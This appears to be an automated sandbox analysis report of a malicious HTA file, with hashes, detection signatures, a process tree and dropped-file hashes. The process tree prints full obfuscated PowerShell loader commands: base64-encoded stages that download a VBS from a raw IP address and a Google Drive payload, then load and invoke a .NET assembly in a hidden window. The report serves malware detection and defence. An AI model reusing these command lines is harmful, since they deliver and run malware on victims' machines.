Analysis
-
max time kernel
137s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31/10/2024, 20:41
Static task
static1
Behavioral task
behavioral1
Sample
seethebestthingswithgreatthingshrewithme.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
seethebestthingswithgreatthingshrewithme.hta
Resource
win10v2004-20241007-en
General
-
Target
seethebestthingswithgreatthingshrewithme.hta
-
Size
205KB
-
MD5
d50fd6f65b574b2c9ca393cbd44ecf11
-
SHA1
1f2126c711c25c4104cf34d42316db0cf8b50d89
-
SHA256
d4ceed54c4c40a1ab8e3dc310e96ad94aa5bb7e65269cac051d974257fb44e90
-
SHA512
c91cf64044091d7bef8c05e19e28b0c1403960d0944d96e4f68da241b36bfac1689aae6d07356721853a732ee919abe5d1686baf6625f58d5802110e390b20d8
-
SSDEEP
96:43F97tMfPVMXbfrrFAQGFYIO7QpOMPMKtbMxQ:43F1tiV2VAQTt8NNcQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 20 2908 PowErSHell.Exe 25 1888 powershell.exe 28 1888 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3464 powershell.exe 1888 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2908 PowErSHell.Exe 5060 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 24 drive.google.com 25 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowErSHell.Exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings PowErSHell.Exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2908 PowErSHell.Exe 2908 PowErSHell.Exe 5060 powershell.exe 5060 powershell.exe 3464 powershell.exe 3464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2908 PowErSHell.Exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeDebugPrivilege 3464 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 3916 wrote to memory of 2908 3916 mshta.exe 85 PID 3916 wrote to memory of 2908 3916 mshta.exe 85 PID 3916 wrote to memory of 2908 3916 mshta.exe 85 PID 2908 wrote to memory of 5060 2908 PowErSHell.Exe 89 PID 2908 wrote to memory of 5060 2908 PowErSHell.Exe 89 PID 2908 wrote to memory of 5060 2908 PowErSHell.Exe 89 PID 2908 wrote to memory of 4816 2908 PowErSHell.Exe 94 PID 2908 wrote to memory of 4816 2908 PowErSHell.Exe 94 PID 2908 wrote to memory of 4816 2908 PowErSHell.Exe 94 PID 4816 wrote to memory of 1444 4816 csc.exe 95 PID 4816 wrote to memory of 1444 4816 csc.exe 95 PID 4816 wrote to memory of 1444 4816 csc.exe 95 PID 2908 wrote to memory of 456 2908 PowErSHell.Exe 97 PID 2908 wrote to memory of 456 2908 PowErSHell.Exe 97 PID 2908 wrote to memory of 456 2908 PowErSHell.Exe 97 PID 456 wrote to memory of 3464 456 WScript.exe 98 PID 456 wrote to memory of 3464 456 WScript.exe 98 PID 456 wrote to memory of 3464 456 WScript.exe 98 PID 3464 wrote to memory of 1888 3464 powershell.exe 103 PID 3464 wrote to memory of 1888 3464 powershell.exe 103 PID 3464 wrote to memory of 1888 3464 powershell.exe 103
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingshrewithme.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\SysWOW64\wiNDowsPowERsHEll\V1.0\PowErSHell.Exe"C:\Windows\sysTem32\wiNDowsPowERsHEll\V1.0\PowErSHell.Exe" "POWErSheLl.exe -eX BYPAsS -nOp -w 1 -C deVIcECREdEnTiaLDeplOyMENt.exE ; IEx($(IeX('[sYstEM.TEXT.ENCoDInG]'+[chAr]0x3A+[CHar]0x3a+'Utf8.gETSTriNG([SystEM.ConvERT]'+[chAr]58+[ChaR]58+'fROmBAsE64sTRiNg('+[CHar]34+'JHpiejRLVXlZczhPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFZmlOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGdnUFl2VVgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERSVixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPUEMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6enFhc29aYnUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1PdEZ0dW1mTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkemJ6NEtVeVlzOE86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc1LjEzMC4zNi8xMjAvcGljdHVyZXdpdGhncmVhdHRoaW5nc2dvb2RpZGVhcGxhbm5pbmdmb3IudElGIiwiJGVOdjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nnb29kaWRlYXBsYW5uaW5nLnZicyIsMCwwKTtTVGFSVC1zTEVFcCgzKTtTVEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdHRoaW5nc2dvb2RpZGVhcGxhbm5pbmcudmJzIg=='+[ChAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BYPAsS -nOp -w 1 -C deVIcECREdEnTiaLDeplOyMENt.exE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c1r5q4ah\c1r5q4ah.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB20A.tmp" "c:\Users\Admin\AppData\Local\Temp\c1r5q4ah\CSC3B298DCFA8FE454494638AFD1EEC7C99.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:1444
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithgreatthingsgoodideaplanning.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdFdC1WQVJJYUJsRSAnKk1EUionKS5uQW1FWzMsMTEsMl0tam9pTicnKSgoKCdZaHhpbWFnZVVybCA9IHNpRWh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcicrJ3Q9ZG93bmxvJysnYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHNpRTtZaHh3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1loeGltYWdlQnl0ZXMgPSBZaHh3ZWJDbGllbnQuRG93bmxvYWREYXRhKFloeGltYWdlVXJsKTtZaHhpbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jb2RpJysnbicrJ2ddOjpVVEY4LkdldFN0cmluZyhZaHhpbWFnZUJ5dGVzKTtZaHhzdGFydEZsYWcgPSBzaUUnKyc8PEJBU0U2NF9TVEFSVD4+c2lFO1loeGVuZEZsYWcgPSBzaUU8PEJBU0U2NF9FTkQ+PnNpJysnRTtZaHhzdGFydEluZGV4ID0gWWh4aW1hZ2VUZXh0LkluZGV4T2YoWWh4c3RhcnRGbCcrJ2FnKTtZaHhlbmRJbmRleCcrJyA9IFloeGltYWdlVGUnKyd4dC5JbmRlJysneE9mKFloeGVuZEZsYScrJ2cpO1knKydoeHN0JysnYXJ0SW5kZXggLWdlIDAgLWFuZCBZaHhlbmRJbmRleCAtZ3QnKycgWWh4c3RhcnRJbmRleDtZaHhzdGFydEluZGV4ICs9IFloeHN0YXJ0RmxhZy5MZW5ndGg7WWh4YmFzZTY0TGVuZ3RoID0gWWgnKyd4ZW5kSW5kZXggLSBZaHhzdGFydEluZGV4JysnO1loeGJhc2U2NENvbW1hbmQgPSBZaHhpbWFnJysnZVRleHQuU3Vic3RyaW5nKFloeCcrJ3N0YXJ0SW5kZXgsIFloeGJhcycrJ2U2NExlbmd0aCk7WWh4YmEnKydzZTY0UmV2ZXJzZWQgPSAtam9pbiAoWWh4YicrJ2FzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIFFSeiBGJysnbycrJ3JFYWNoLU9iamVjdCB7IFloeF8gfSlbLTEuLi0oWWh4YmFzZTY0Q28nKydtbWFuZC5MZW5ndGgpXTtZaHhjb21tYW5kQnl0ZXMgPSBbJysnU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFloeGJhc2U2NFJldmVyc2VkKTtZaHhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoWWh4Y29tbWFuZEJ5dGVzKTtZaHh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2UnKyd0TWV0aG9kKHNpRVZBSXNpRSk7WWh4dmFpJysnTWV0aG9kLkludm9rZShZaHhudWxsLCBAKHMnKydpRXQnKyd4JysndC5ERk5OUkQvMDIxJysnLzYzLjAzMS41NzEuNzAxLy86cHR0aHNpRSwgc2lFJysnZGVzYXRpJysndmFkb3NpRSwgc2lFZGVzYXRpdmFkb3NpRSwgc2knKydFZGVzYXRpdmFkb3NpRSwgc2lFQ2FzUG9scycrJ2lFLCBzaUVkZXNhdGl2YWRvc2lFLCBzaUVkZXNhdGl2YWRvc2lFLHNpRWRlc2F0aXZhZG9zaUUsc2lFZGVzYXRpdmFkb3NpRSxzaUVkZXNhdGl2YWRvc2lFLHNpRWRlc2F0aXZhZG9zJysnaUUsc2lFZGVzYXRpdmFkb3NpRSxzaUUxc2lFLHNpRWRlc2F0aXZhZG9zaUUpKTsnKSAgLXJlUExhQ0UgIChbQ0hBUl0xMTUrW0NIQVJdMTA1K1tDSEFSXTY5KSxbQ0hBUl0zOSAgLWNyRXBMQWNlJ1loeCcsW0NIQVJdMzYgLWNyRXBMQWNlIChbQ0hBUl04MStbQ0hBUl04MitbQ0hBUl0xMjIpLFtDSEFSXTEyNCkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((gEt-VARIaBlE '*MDR*').nAmE[3,11,2]-joiN'')((('YhximageUrl = siEhttps://drive.google.com/uc?expor'+'t=downlo'+'ad&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur siE;YhxwebClient = New-Object System.Net.WebClient;YhximageBytes = YhxwebClient.DownloadData(YhximageUrl);YhximageText = [S'+'ystem.Text.Encodi'+'n'+'g]::UTF8.GetString(YhximageBytes);YhxstartFlag = siE'+'<<BASE64_START>>siE;YhxendFlag = siE<<BASE64_END>>si'+'E;YhxstartIndex = YhximageText.IndexOf(YhxstartFl'+'ag);YhxendIndex'+' = YhximageTe'+'xt.Inde'+'xOf(YhxendFla'+'g);Y'+'hxst'+'artIndex -ge 0 -and YhxendIndex -gt'+' YhxstartIndex;YhxstartIndex += YhxstartFlag.Length;Yhxbase64Length = Yh'+'xendIndex - YhxstartIndex'+';Yhxbase64Command = Yhximag'+'eText.Substring(Yhx'+'startIndex, Yhxbas'+'e64Length);Yhxba'+'se64Reversed = -join (Yhxb'+'ase64Command.ToCharArray()'+' QRz F'+'o'+'rEach-Object { Yhx_ })[-1..-(Yhxbase64Co'+'mmand.Length)];YhxcommandBytes = ['+'System.Convert]::FromBase64String(Yhxbase64Reversed);YhxloadedAssembly = [System.Reflection.Assembly]::Load(YhxcommandBytes);YhxvaiMethod = [dnlib.IO.Home].Ge'+'tMethod(siEVAIsiE);Yhxvai'+'Method.Invoke(Yhxnull, @(s'+'iEt'+'x'+'t.DFNNRD/021'+'/63.031.571.701//:ptthsiE, siE'+'desati'+'vadosiE, siEdesativadosiE, si'+'EdesativadosiE, siECasPols'+'iE, siEdesativadosiE, siEdesativadosiE,siEdesativadosiE,siEdesativadosiE,siEdesativadosiE,siEdesativados'+'iE,siEdesativadosiE,siE1siE,siEdesativadosiE));') -rePLaCE ([CHAR]115+[CHAR]105+[CHAR]69),[CHAR]39 -crEpLAce'Yhx',[CHAR]36 -crEpLAce ([CHAR]81+[CHAR]82+[CHAR]122),[CHAR]124) )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1888
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD55c6e7e1c15ba9df69e786230d5ab02ea
SHA149159b5236ef5338cd956284e551de13234e03b8
SHA256f16d450c5e474186a7dc0eb108477324257c9d09bf02040374f5d084eff69257
SHA512113332388581ff172f31027e4cadebe087ec2a68147005f8f2c07316bdc437870b55d887d8c0e71eff6aeaa9cc76003fa3a4998ac382504ee54cde08b16943e1
-
Filesize
1KB
MD5faf320fd53f57ebb1af650fd4010394a
SHA18831dabd7c0edb34fe68fba6b409c4f02e506af5
SHA256fc952968c89411818d069603908e820cab76b6c532227967603da227df5e77a3
SHA512dfd3566a90e90a45adf36132acb5160fc0f7f97c788768f3111f1448306cdf92ebd0c927918f9f47c231b540384d7c91d1aa69b40b1fcc5b19656189b627bbd4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD50b6737974be6f5505631c4db90705986
SHA175ca18e3ec8e6cb1037b9832f6098a1195fb8b28
SHA256a7659d4e7c338a52ada62223ce7f6b8eec63a6c89d16ec7ecd70aa5bd8e5936e
SHA512a26ac58bb72e79ec78a7f18661904adc0feebb8270ddf9448d30c4de641a7e22a8d70cdccb9cf8a07fe9a1893bf691b8c758e784bf091477dd7ca3b0621600ec
-
Filesize
138KB
MD59bffefbc57020a8809b3782eb2a8f14c
SHA1487d426d1e74b0ce7cf26b11c5a828d640b36f4b
SHA256bb276fb4cfa1b0f9fbd68566672cef1f670e70691c387d6fe11d8176cb009995
SHA512a93f4d082d9255b91be0d2e5449acb845a304f3b5fefc5644052e6018dd0cde4998f80932599ad7761b758870748c47b2bbe51bfa1c82c749fab01b0d118e075
-
Filesize
652B
MD598da14d00f35eba03e0ae504810d7518
SHA11fbcb3ed0ea0d0a77c5a49a34c8b3465879ed1ef
SHA2562b29acb72b7533b29eb849c1ce71e08a4e19cb7c318af020293d2ba474fc90db
SHA512541dccef7b612e0f73f9abfda41687270bcaf1f513b2f9df9714c6003426c73192b5b6557f2623a41677f3c7500b08f8e6e94dff50f07523e2d9ad3fbb446da8
-
Filesize
469B
MD5f89c3daa6416168719346d97618dab89
SHA1291029ed13418eefcd0902435ecac1b3caeb61f2
SHA2560ae5932bfd2ff3ff3a4522cf176bc41a9062d1e981d01a73e9e8a72664423b0d
SHA5129a8ebe03128f7fbc0c5adf8d76060d7f9b1a7d4319f0cdc0af64ca80e0eba34c6c91796d1f04f044b1c1a4ec5d30a9dcf57aa662ed138f9f3f983d915216cb55
-
Filesize
369B
MD5440968b332c4527d6cd0d111f358fddb
SHA16f0c87ebfa49e4d5815d56b9702e43cc40f3f142
SHA256fcf9feb94669ab9b70f9b4e3af8e07af7b085cfdd9f96e4b3d944181b229f669
SHA5124c04bc167d7241ec2b5c5792f354a097f20390d770a4f4e4621c7db32936cb832c5e28aed6dbe4784a9d1aa9863409075aa17fdae5d463edd5ff088464bad1c9